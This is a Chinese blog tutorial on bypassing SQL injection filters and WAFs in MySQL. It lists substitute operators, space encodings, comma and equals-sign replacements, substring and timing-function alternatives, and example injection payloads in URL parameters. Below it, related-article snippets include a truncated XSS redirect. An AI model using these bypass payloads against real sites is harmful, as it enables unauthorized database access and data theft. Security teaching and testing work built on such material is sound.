html sql注入_SQL注入特殊小技巧

最新推荐文章于 2023-08-10 15:13:14 发布
最新推荐文章于 2023-08-10 15:13:14 发布
阅读量239 收藏 1
点赞数
文章标签: html sql注入 sql 取特殊符号后 sql盲注如何解决
a24bd9dc4906e675c49f8c144f7cb69b.png 一位苦于信息安全的萌新小白帽 本实验仅用于信息防御教学,切勿用于它用途 公众号:XG小刚  小技巧 
在平常的SQL注入过程中,难免会存在一些敏感函数被过滤,或者被WAF识别所拦截。所以我们可以通过其他不常用的函数来绕过过滤,实现相同的效果。 在此只通过 MYSQL数据库 来表达意思, 其他 数据库自行百度谷歌。。。。。。  逻辑运算符 
注入过程中,用到最最最频繁的就是逻辑符号,像and 1=1、or 2>1等。当发现and,or,=等逻辑符号被过滤后我就很气愤。气愤归气愤,我们可以通过别的 特殊符号 来替代他们,这样就该他们气愤了,哈哈哈。。。

or替代

当发现or被过滤时,我们可以用”||”替代

?id = 2' or 1=1 --+?id = 2' || 1=1 --+

and替代

当发现and被过滤时,我们可以用”&&”替代

?id = 1' and 1=1 --+?id = 1' && 1=1 --+

异或运算符 ”^”

异或运算符”^”过滤时,用”XOR”替代

?id=1 union select 1=1 XOR 1=1--+?id=1 union select 1=1 ^ 1=1 --+

逗号

逗号被过滤可以使用join函数将参数连接起来

?id=1 union select 11,22,33--+?id=1 union select * from (select 11)a join (select 22)b join (select 33)c --+

空格

当空格被过滤删除时,使用加号 +,或者空字符串来代替
通用空字符串:%0a %0b %0c %0d %A0 %20 %09
特别注意 %A0 这个不会被php的\s进行匹配
使用内联注释也可以代替空格/**/

?id=1 and 1=1 --+?id=1%A0and%A01=1%A0--+?id=1/**/and/**/1=1/**/--+

等于号”=”

当等于号”=”被过滤时,可以使用很多种函数替代1.Between:在什么什么之间

select database() between 0x61 and 0x7a

2.in:in常用于mysql的where表达式中来查询某个范围内的数据

select * from user where id in (1,2,3)
3.Like:模糊查询,可以当等于号用 
?id=2 and 1 like 1?id = 1.1 and 1=1
4.使用正则代替等于号,regexp等同于rlike  盲注函数被过滤 
在进行盲注时候,用的最多的就是substr()截取字符串,当此函数被过滤,我们可以使用其他函数截取字符串

left(str, length)

从左边length位截取字符串

select left(‘abcdefghijklmn’,8)

结果为:abcdefgh

right(str,length)

使用方法同left

mid(str,start,length)

截取字符串从start开始并截取length长度,相当于substr()

Locate(substr,str)

locate是用来返回字符串的位置
locate(substr,str)返回字符串substr中第一次出现str的位置

select locate("d",'www.baidu.com') #返回8
locate(substr,str,pos)返回字符串substr中第一次出现str的位置,从第pos个位置开始 
SELECT locate("a",'pan.baidu.com',3)#返回6
locate()用来判断字符串长度 
select locate('m','m123456m',15)

position (substr IN str)

position 的效果与instr(),locate()相同,但语法不同

用法:POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同
例:返回字符串“d”自一次出现的位置

SELECT position("d"in’www.baidu.com’);

结果:8

替代ascii

Hex(),Bin(),Ord()

字符串截取函数在mysql中有许多,主要利用得当,一样可以达到盲注的效果

 其他 
sleep过滤

当sleep函数被过滤,可以使用benchmark函数。他是指执行某函数的次数,次数多了照样实现sleep函数相同的时间延迟。

benchmark(100000,SHA1(‘1’)), 1

database(),version()被过滤

当database(),concat()函数被过滤,可以在名和括号之间加入特殊字符,例如

database/**/()`version`()

报错注入

报错注入是利用某些函数报错,来爆出所需要的内容

可以阅读此文章来了解报错注入:

https://www.cnblogs.com/richardlee97/p/10617115.html

总结

在SQL注入过程中难免会有磕磕绊绊,不要放弃,静下心来钻研,总会有解决之法。
尤其是后端的各种过滤,WAF的拦截等等,慢慢研究就会轻松绕过。
SQL注入不会的可以阅读我的这两篇博客了解一下。sql手工注入数据库类型判断

weixin_39722188
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
注入双括号报错注入_这可能是SQL注入入门最好的文章了(持续跟新四)
weixin_36298476的博客
01-12 313
sqli-labs Less-4本系列文章使用的靶场环境为sqli-labs环境下载地址:https://github.com/Audi-1/sqli-labs本系列文章持续跟新,一直到通过此靶场为止,如果对本文有疑问可以在下方给我留言,或者私信。希望大家可以点赞转发,支持一下作者1.判断注入类型index.php?id=1"单引号回显正常,双引号会报错然后根据报错,我们可以得知这个sql注入页面...
SQL注入双括号报错注入
studyphp123的博客
04-22 1212
一、预备知识 1. SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 2. 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从...
Sql注入Html注入
weixin_30245867的博客
03-23 522
举例说,有一间公司的网页服务器上有一个留言板的代码,用来让用户发表简短的口信,例如: hello word!!!! 不过,这个代码原来有漏洞。一个意图入侵者得悉这间公司采用了有问题的代码,于是试图通过留下一条附带有代码的口信,例如: Nice Site, I think I'll take it.><script>document.location='htt...
OC 获view相对位置_SQL注入数据的原理
weixin_39602005的博客
11-16 154
渗透技巧SQL注入什么是SQL注入呢。SQL注入就是WEB应用没对用户输入的数据进行限制和检查,导致恶意攻击者可以通过网页的显示情况不同甚至是直接显示数据而获数据库数据的一种攻击方式。首先看下回显注入,这个简单,这个SQL注入是由于浏览器没有对URL后面id的参数进行限制,我们通过联合查询这样的SQL语句就能查询到有哪些数据库并且直接显示在网页上,想要查询其他的数据,更改查询语句即可。现在我们...
前端的“SQL注入”,处理含有html标签的字符串
最新发布
cxk_ctrl的博客
08-10 274
处理含有HTML标签的字符串
SQL脚本_UI_sql注入_sql_
10-01
在IT行业中,SQL注入是一种常见的安全漏洞,攻击者利用它来操纵或窃数据库中的敏感信息。本主题主要关注通过用户界面(UI)执行的SQL注入攻击,以及两种常见的注入技术:报错注入和基于布尔及时间的盲注。下面我们...
PHP防止sql注入技巧sql预处理原理与实现方法分析
01-20
本文实例讲述了PHP防止sql注入技巧sql预处理原理与实现方法。分享给大家供大家参考,具体如下: 我们可以把sql预处理看作是想要运行的 SQL 的一种编译过的模板,它可以使用变量参数进行定制。 我们来看下它有...
SQL注入的2个小Trick及示例总结
09-09
本文将详细介绍两个关于SQL注入的小技巧,以及如何利用它们进行盲注攻击。 ### BETWEEN AND 操作符的利用 **BETWEEN AND** 操作符在SQL中用于选位于两个值之间的一个数据范围。例如,如果你有一个`id`字段,你...
PHP与SQL注入攻击防范小技巧
01-20
下面来谈谈SQL注入攻击是如何实现的,又如何防范。 看这个例子: 复制代码 代码如下: // supposed input $name = “ilia’; DELETE FROM users;”; mysql_query(“SELECT * FROM users WHERE name='{$name}'”); 很...
sql注入过程详解_动力节点Java学院整理
09-09
在本文中,我们将深入探讨SQL注入的过程,并提供如何判断和区分不同数据库类型的技巧。 首先,SQL注入的基本思路是通过在输入参数中插入恶意的SQL代码,以欺骗数据库执行非预期的操作。以下是一个典型的SQL注入过程...
12-Web安全—基于SQL Server的报错注入——and,conver,cast
网络安全
07-11 2358
我们知道SQL Server是由微软开发,很优秀的数据库,可以精确地定位错误消息,这点对开发人员非常友好,特别是对于web安全工作者来说,利用SQL Server报错的信息对目标系统有效进行渗透测试。 报错注入的使用场景学习MYSQL注入时已经说过,这里就不再赘述,在Less-5中输入id=1' and 1=(@@version)--+ 进行数据库报错: 数据库在执行sql语句时,会把1=(@@version)语句中括号里的内容当做int类型的数字来处理,但@@version本身是nvarch.
注入双括号报错注入_SQL手动注入:sqlilabs(less110)
weixin_39835792的博客
01-12 160
种一棵树最好的时间是10年前,其次是现在。忘了是谁前言说实话,由于前段时间学 python,对于 OWASP TOP10漏洞的学习都有所落下,虽然现在也在慢慢复习当中,但是今晚谈及的 SQL 注入漏洞手动注入和自动化(sqlmap)注入的一些知识时,不免有些语塞,有些命令都已经开始淡忘,想想得补一补,于是就打算拿 sqli-labs这个SQL 注入专属练习靶场来重温一下,顺便把之前...
报错注入——[极客大挑战 2019]HardSQL
热门推荐
sid10t.
10-13 3万+
文章目录知识点解题 知识点 报错注入: 详情:https://www.cnblogs.com/richardlee97/p/10617115.html 原因: 因为虚拟表的主键重复。按照 MySQL 的官方说法,group by 要进行两次运算,第一次是拿 group by 后面的字段值到虚拟表中去对比前,首先获group by 后面的值;第二次是假设 group by 后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand 函数存在一定的随机性,所以第二次
html sql注入_常见SQL注入的方法
weixin_39894233的博客
12-01 1489
WEB安全之SQL注入引言:在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。1、SQL注入步骤a)寻找注入点,构造特殊的语句传入SQL语句可控参数分为两类1. 数字类型,参数不用被引号括起来,如?id=12. 其他类型,参...
sql语句 起别名的问题
小发发
01-08 2573
sql语句中字段的别名中含有括号时,则需要用双引号将其引起来,则会减少错误。 (1)当别名中含有括号时: Select sysdate as 系统日期(包含时分秒) from dual; 则会出现以下错误: (2)将别名用引号引起来后: Select sysdate as “系统日期(包含时分秒)” from dual; (3)用单引号会引发另外的错误: (4)
mysql 在时间上加120s_MySQL中一个双引号的错位引发的血案
weixin_40005437的博客
01-21 129
一、前言最近经常碰到开发误删除误更新数据,这不,他们又给我找了个麻烦,我们来看下整个过程。二、过程由于开发需要在生产环节中修复数据,需要执行120条SQL语句,需要将数据进行更新于是开发连上了生产数据库,首先执行了第一条SQLupdatetablenamesetsource_name="bj1062-北京市朝阳区常营北辰福第"wheresource_name="-北京市...
链接注入(便于跨站请求伪造)
日拱一卒无有尽,功不唐捐终入海
11-25 1万+
安全风险: 可能会劝说初级用户提供诸如用户名、密码、信用卡号、社会保险号等敏感信息可能会窃或操纵客户会话和 cookie,它们可能用于模仿合法用户,从而使黑客能够以该用户身份查看或变更用户记录以及执行事务可能会在 Web 服务器上上载、修改或删除 Web 页面、脚本和文件 可能原因 未对用户输入正确执行危险字符清理 技术描述 “链接注入”是修

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值